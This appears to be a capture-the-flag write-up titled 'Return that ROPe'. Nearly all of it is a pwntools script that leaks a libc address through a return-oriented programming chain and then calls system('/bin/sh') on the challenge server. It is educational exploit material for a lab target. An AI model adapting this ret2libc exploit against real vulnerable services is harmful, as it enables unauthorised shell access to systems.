# Return that ROPe

![Binary checksec](https://1833529925-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FinQyBSsBMfzzjTjEh3xk%2Fuploads%2FJN6WTcBctTsT71BlCNID%2Fimage.png?alt=media\&token=57456093-54d9-478e-accc-c3c596f3317a)

![Libc found after leak of address](https://1833529925-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FinQyBSsBMfzzjTjEh3xk%2Fuploads%2F5AIMYQisiXE2MYY7YwqI%2Fimage.png?alt=media\&token=94c16c4c-7c56-4308-abb2-8b924615acb2)

```python
from pwn import *

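# Target selection: LOCAL runs the patched binary, REMOTETTCP talks to the CTF service.
LOCAL = False
REMOTETTCP = True
host = 'challenges.ctf.cert.rcts.pt'
port = 41135
LOCAL_BIN = "./rop_patched"
context.clear(arch='amd64')
# Libc build matched to the remote target (presumably via the leaked puts address, see above).
LIBC = ELF("libc6_2.27-3ubuntu1.4_amd64.so")


if LOCAL:
    P = process(LOCAL_BIN)
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)

elif REMOTETTCP:
    P = remote(host, port)
    # The local copy is only used for symbol/gadget lookup; the connection is remote.
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)


# Padding up to the saved return address (assumed 40 bytes for this binary — not derived here).
OFFSET = b'A' * 40

PUTSGOT = ELF_LOADED.got['puts']
MAIN = ELF_LOADED.symbols['main']
PUTSPLT = ELF_LOADED.plt['puts']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]
RET = (ROP_LOADED.find_gadget(['ret']))[0]

log.info("puts@plt: " + hex(PUTSPLT))
log.info("puts@got: " + hex(PUTSGOT))
log.info("pop rdi gadget: " + hex(POP_RDI))

# Stage 1: call puts(puts@got) to print the resolved libc address of puts, then
# return to main so a second payload can be sent.
payload = OFFSET
payload += p64(POP_RDI)
payload += p64(PUTSGOT)
payload += p64(PUTSPLT)
payload += p64(MAIN)

P.sendline(payload)

# The third of the four received lines carries the raw (little-endian, unpadded) address.
leakedlib = P.recvlines(4)[2]
# Fix: the original referenced an undefined name `a` here (NameError); the leaked line is `leakedlib`.
leak = u64(leakedlib.strip().ljust(8, b'\x00'))

log.info("Leaked puts@got: %s" % hex(leak))  # With this search libc

# Libc base = leaked puts address minus puts' offset inside the identified libc build.
LIBC.address = leak - LIBC.sym["puts"]
log.info("Address of libc %s " % hex(LIBC.address))

# Stage 2: system("/bin/sh") with an extra `ret` to keep the stack 16-byte aligned.
BINSH = next(LIBC.search(b"/bin/sh"))
SYSTEM = LIBC.sym["system"]
# NOTE: this overrides the `ret` gadget found via ROP_LOADED above with a hard-coded address;
# kept as the author chose it for alignment.
RET = 0x0000000000401016  # RET for stack alignment.

payload = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(RET) + p64(SYSTEM)

P.sendlineafter(b'Can you ROP it?', payload)

# Fix: the original wrote `P.interactive` without calling it, so the session was never attached.
P.interactive()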
```
